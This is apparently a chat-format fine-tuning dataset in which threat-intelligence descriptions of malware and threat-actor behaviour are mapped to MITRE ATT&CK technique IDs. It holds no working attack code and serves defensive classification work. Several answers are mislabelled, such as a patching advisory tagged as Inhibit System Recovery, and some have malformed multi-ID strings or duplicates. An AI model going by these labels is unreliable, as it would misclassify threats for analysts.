- "role": "user",
- "content": "Andariel has downloaded additional tools and malware onto compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BBK has the ability to decrypt AES encrypted payloads."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sowbug named its tools to masquerade as Windows or Adobe Reader software, such as by using the file name adobecms.exe and the directory \"CSIDL_APPDATA\\microsoft\\security\"."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can obtain information on installed anti-malware programs."
- },
- {
- "role": "assistant",
- "content": "T1518.001 - Software Discovery: Security Software Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Wizard Spider has used services.exe to execute scripts and executables during lateral movement within a victim network."
- },
- {
- "role": "assistant",
- "content": "T1569.002 - System Services: Service Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "created accounts disguised as legitimate backup and service accounts as well as an email administration account."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dridex contains a backconnect module for tunneling network traffic through a victim's computer. Infected computers become part of a P2P botnet that can relay C2 traffic to other infected peers."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDAT has executed commands using \"cmd.exe /c\"."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may attempt to connect to systems within a victim's network using net use commands and a predefined list or collection of passwords."
- },
- {
- "role": "assistant",
- "content": "T1110 - Brute Force"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PowerLess has the ability to exfiltrate data, including Chrome and Edge browser database files, from compromised machines."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "While sending to the C2 server, the data is formatted as follows: @{SYSINFO = $get.ToString(); ACTION = \"REGISTER\";} Ability to take screenshots"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BlackMould can run cmd.exe with parameters."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses Google Search to identify C2 servers if its primary C2 method via Twitter is not working."
- },
- {
- "role": "assistant",
- "content": "T1008 - Fallback Channels"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Following exploitation with LOWBALL malware, admin@338 actors created a file containing a list of commands to be executed on the compromised computer."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "PUNCHBUGGY can establish using a AppCertDLLs Registry key."
- },
- {
- "role": "assistant",
- "content": "T1546.009 - Event Triggered Execution: AppCert DLLs"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly has manipulated .lnk files to gather user credentials in conjunction with Forced Authentication."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware can download additional files from C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "runs the ifconfig command to obtain the IP address from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can upload files from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan downloads the contents of this file by crafting an HTTP request to a URL structured as follows: + + “?alt=media” With the contents of the file downloaded, the Trojan sets the modification_time variable to the current modification time so the Trojan knows when the actor makes further changes to the file"
- },
- {
- "role": "assistant",
- "content": "T1070.006 - Indicator Removal on Host: Timestomp', 'T1083 - File and Directory Discovery', 'T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Certutil is a living-off the land command line utility that can be used to obtain certificate authority information and configure certificate services. Threat actors usually utilize certutil to download remote files from a given URL. It also incorporates a built-in function to decode base64-encoded files"
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to exploit privilege escalation vulnerabilities CVE-2010-0232 or CVE-2010-4398."
- },
- {
- "role": "assistant",
- "content": "T1068 - Exploitation for Privilege Escalation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BUBBLEWRAP can communicate using HTTP or HTTPS."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI has used the command \"cmd /c tasklist\" to get a snapshot of the current processes on the target machine."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RDFSNIFFER hooks several Win32 API functions to hijack elements of the remote system management user-interface."
- },
- {
- "role": "assistant",
- "content": "T1056.004 - Input Capture: Credential API Hooking"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Apply the Microsoft security updates for MS17-010, including the updates for the Windows XP and Windows Server 2003 legacy operating systems. Disable SMBv1 on systems where it is not necessary (e.g. hosts that do not need to communicate with Windows XP and Windows 2000 systems). Carefully evaluate the need for allowing SMBv1-capable systems on interconnected networks compared to the associated risks. Scan networks for the presence of the DoublePulsar backdoor using plugins for tools such as Nmap. Use network auditing tools to scan networks for hosts that are vulnerable to the vulnerabilities described in MS17-010. Implement a backup strategy that includes storing data using offline backup media. Backups to locally connected, network-attached, or cloud-based storage are often insufficient because ransomware frequently accesses and encrypts files stored on these systems"
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "If the user does not have permissions to add a service, the installation routine attempts to add persistence by creating the following registry key that will run the functional code within Emissary via an exported function named \"DllRegister"
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOLMIUM has been observed using various vectors for initial access, including spear-phishing email, sometimes carrying archive attachments that exploit the CVE-2018-20250 vulnerability in WinRAR, and password-spraying. Many of their recent attacks, however, have involved the penetration testing tool Ruler used in tandem with compromised Exchange credentials"
- },
- {
- "role": "assistant",
- "content": "T1110.003 - Brute Force: Password Spraying"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Naid creates a new service to establish."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "NETWIRE can discover and close windows on controlled systems."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has used a keylogging tool called KEYPUNCH."
- },
- {
- "role": "assistant",
- "content": "T1056 - Input Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "compromised three Japanese websites using a Flash exploit to perform watering hole attacks."
- },
- {
- "role": "assistant",
- "content": "T1189 - Drive-by Compromise"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Passgrabber module – collects logins and passwords from various sources: Firefox and Chrome files, Microsoft Vault storage, etc. Instead of using Mimikatz as in previous versions, the module collects passwords using its own algorithms"
- },
- {
- "role": "assistant",
- "content": "T1555.003 - Credentials from Password Stores: Credentials from Web Browsers"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the ipconfig command."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Shamoon attempts to access the \"ADMIN$\", \"C$\\Windows\", \"D$\\Windows\", and \"E$\\Windows\" shares on the victim with its current privileges."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Uploads a file on the victim’s computer to the C&C server"
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has built in commands to identify a host’s IP address and find out other network configuration settings by viewing connected sessions."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A modified EternalBlue exploit, also used by WannaCry.. The EternalRomance exploit – a remote code execution exploit targeting Windows XP to Windows 2008 systems over TCP port 445 (Note: patched with MS17-010).. An attack against the update mechanism of a third-party Ukrainian software product called MeDoc."
- },
- {
- "role": "assistant",
- "content": "T1203 - Exploitation for Client Execution"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Ramsay can spread itself by infecting other portable executable files on removable drives."
- },
- {
- "role": "assistant",
- "content": "T1091 - Replication Through Removable Media"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Tomiris can upload files matching a hardcoded set of extensions, such as .doc, .docx, .pdf, and .rar, to its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TYPEFRAME can uninstall malware components using a batch script. TYPEFRAME can execute commands using a shell."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "GravityRAT uses the \"netstat\" command to find open ports on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Earth Lusca has compromised victims by directly exploiting vulnerabilities of public-facing servers, including those associated with Microsoft Exchange and Oracle GlassFish."
- },
- {
- "role": "assistant",
- "content": "T1190 - Exploit Public-Facing Application"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Once executed, Vcrodat loads an encrypted payload on to the victim’s computer."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Conti ransomware deletes Windows Volume Shadow Copies using vssadmin."
- },
- {
- "role": "assistant",
- "content": "T1490 - Inhibit System Recovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "launches a scheduled task."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Even simple API calls were obfuscated, and instead of just calling the functions, Siloscape made the effort to use the Native API (NTAPI) version of the same function"
- },
- {
- "role": "assistant",
- "content": "T1106 - Native API', 'T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FlawedAmmyy can collect clipboard data."
- },
- {
- "role": "assistant",
- "content": "T1115 - Clipboard Data"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dtrack has used a dropper that embeds an encrypted payload as extra data."
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information', 'T1027.009 - Embedded Payloads"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Cobalt Strike can produce a sessions report from compromised hosts."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can collect credentials from WINSCP."
- },
- {
- "role": "assistant",
- "content": "T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The tokens for each platform are hardcoded within the sample:November 2016 to January 2017: \"Evil New Year\" CampaignIn the early part of 2017, Group123 started the \"Evil New Year\" campaign"
- },
- {
- "role": "assistant",
- "content": "T1134 - Access Token Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Maze has used the \"WNetOpenEnumW\", \"WNetEnumResourceW”, “WNetCloseEnum” and “WNetAddConnection2W” functions to enumerate the network resources on the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1049 - System Network Connections Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "These commands are also executed when the loadconfig command is issued"
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Revenge RAT collects the IP address and MAC address from the system."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Static analysis of this executable shows only two functions, but a regular number of imports. Upon detecting a debugger attached to it, the malware will display the message below and terminate the execution. This packer also hides the calls to API functions. This time instead of using a dispatcher function, the malware pushes the arguments into the stack as usual but will then perform a call to a jump table built during the unpacking, in the .text section memory region. Each entry finishes with a jmp instruction into the respective API function. Effectively the malware doesn't do any call to API functions, it always performs a jump. The end result is the same has in the packer from 2016, but with a simpler mechanism. One of the anti-analysis features included in this packer is the lack of calls to API functions. In the early stages of execution, the malware loads the libraries and retrieves the addresses from functions it needs. Feature-wise, there is no change when compared with the 2016 version, in fact when compared the C2 beaconing functions even share some of the offsets"
- },
- {
- "role": "assistant",
- "content": "T1497.003 - Time Based Evasion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "In their advisory published on Jan. 26, 2022, CERT-UA asserted that the initial vector for the malware, dubbed WhisperGate, was either a supply-chain attack or exploitation. The first payload in this infection is responsible for the initial attempt at wiping the systems. The malware executable wipes the master boot record (MBR) and replaces it with the code responsible for displaying the ransom note. Similar to the notorious NotPetya wiper that masqueraded as ransomware during its 2017 campaign, WhisperGate is not intended to be an actual ransom attempt, since the MBR is completely overwritten and has no recovery options. This wiper also tries to destroy the C:\\ partition by overwriting it with fixed data. The additional steps taken to wipe the actual hard drive partition differentiate its behavior from other wiper malware like NotPetya. However, most modern systems today have switched to GUID Partition Table (GPT) from MBR, which allows for larger file systems and has fewer limitations, potentially limiting some of the impacts of this executable"
- },
- {
- "role": "assistant",
- "content": "T1542.003 - Bootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WarzoneRAT can include a rootkit to hide processes, files, and startup."
- },
- {
- "role": "assistant",
- "content": "T1014 - Rootkit"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Honeybee uses a combination of NTWDBLIB.dll and cliconfg.exe to bypass UAC protections using DLL hijacking."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses the command line and rundll32.exe to execute."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 malware has created scheduled tasks to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "As seen with other ransomware cases, Mimikatz is a key player in dumping credentials but LockBit 2.0 has been occasionally seen utilizing MiniDump as well."
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping', 'T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kimsuky has disguised its C2 addresses as the websites of shopping malls, governments, universities, and others."
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "LiteDuke has the ability to discover the proxy configuration of Firefox and/or Opera."
- },
- {
- "role": "assistant",
- "content": "T1016 - System Network Configuration Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates to its C2 server over HTTP and embeds data within the Cookie HTTP header."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Observed Clop samples try to kill several processes and services related to backups and security solutions. Clop also leverages Code Signing to evade detection"
- },
- {
- "role": "assistant",
- "content": "T1489 - Service Stop"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Okrum was seen using modified Quarks PwDump to perform credential dumping."
- },
- {
- "role": "assistant",
- "content": "T1003.005 - OS Credential Dumping: Cached Domain Credentials"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "schtasks is used to schedule tasks on a Windows system to run at a specific date and time."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SLOTHFULMEDIA has a keylogging capability."
- },
- {
- "role": "assistant",
- "content": "T1056.001 - Input Capture: Keylogging"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Emissary has the capability to execute ver and systeminfo commands."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT29 has used compromised local accounts to access victims' networks."
- },
- {
- "role": "assistant",
- "content": "T1078.003 - Valid Accounts: Local Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Mis-Type may create a temporary user on the system named `Lost_{Unique Identifier}`."
- },
- {
- "role": "assistant",
- "content": "T1136.001 - Create Account: Local Account"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN8's malicious spearphishing payloads use WMI to launch malware and spawn cmd.exe execution. FIN8 has also used WMIC for lateral movement as well as during and post compromise cleanup activities."
- },
- {
- "role": "assistant",
- "content": "T1047 - Windows Management Instrumentation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
